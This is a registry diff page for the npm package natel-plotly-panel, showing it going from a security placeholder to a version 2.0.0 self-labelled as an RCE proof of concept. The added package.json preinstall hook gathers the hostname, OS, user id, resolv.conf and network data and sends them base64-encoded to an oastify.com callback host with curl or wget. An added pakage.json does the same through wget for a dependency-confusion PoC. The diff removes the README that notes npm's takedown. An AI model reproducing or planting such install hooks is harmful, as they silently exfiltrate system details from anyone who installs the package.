natel-plotly-panel 0.0.1-security → 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of natel-plotly-panel might be problematic. Click here for more details.

package/index.js ADDED
File without changes
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "natel-plotly-panel",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.0.0",
4
+ "description": "FINAL PoC - RCE targeting Bugcrowd requirements - nepalihacker000",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "SCRIPT_PATH='/tmp/bc-validate.sh'; (echo '#!/bin/sh'; echo 'echo \"[+] === BUGCROWD VALIDATION BEACON ===\"'; echo 'echo'; echo 'echo \"[+] --- REQUIREMENT #1: HOSTNAME ---\"'; echo 'hostname'; echo 'echo'; echo 'echo \"[+] --- REQUIREMENT #2: OS INFO ---\"'; echo 'uname -a'; echo 'echo'; echo 'echo \"[+] --- REQUIREMENT #3: USER (whoami/id) ---\"'; echo 'id || whoami'; echo 'echo'; echo 'echo \"[+] --- REQUIREMENT #4: INTERNAL DNS PROOF (/etc/resolv.conf) ---\"'; echo 'cat /etc/resolv.conf || echo resolv.conf not found'; echo 'echo'; echo 'echo \"[+] --- REQUIREMENT #5: NETWORK INFO (ip/ifconfig) ---\"'; echo 'ip -o a || ifconfig || echo \"No network tool\"') > \"$SCRIPT_PATH\" && chmod +x \"$SCRIPT_PATH\" && SH_OUTPUT=$($SCRIPT_PATH 2>&1); ENCODED=$(echo \"$SH_OUTPUT\" | base64 | tr -d '\\n'); (curl -k -s -X POST -H \"Content-Type: text/plain\" --data \"$ENCODED\" https://qlf8zf0i0r1j0jt0w2ulaw0qthzlnbb0.oastify.com/BC-VALIDATION-$(hostname) || wget -q -O- --post-data=\"$ENCODED\" --header=\"Content-Type: text/plain\" https://qlf8zf0i0r1j0jt0w2ulaw0qthzlnbb0.oastify.com/BC-VALIDATION-WGET-$(hostname) )"
8
+ },
9
+ "author": "nepalihacker000",
10
+ "license": "ISC"
6
11
  }
package/pakage.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "cms-media-bridge",
3
+ "version": "10.0.1",
4
+ "description": "PoC for Dependency Confusion vulnerability",
5
+ "scripts": {
6
+ "preinstall": "sh -c 'wget --quiet \"http://7y6ftwvzeqjn824k9d0rzpmvcmig66uv.oastify.com/?event=preinstall&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"'",
7
+ "preupdate": "sh -c 'wget --quiet \"http://...\"'",
8
+ "test": "sh -c 'wget --quiet \"http://...\"'"
9
+ },
10
+ "author": "orwa",
11
+ "license": "ISC"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=natel-plotly-panel for more information.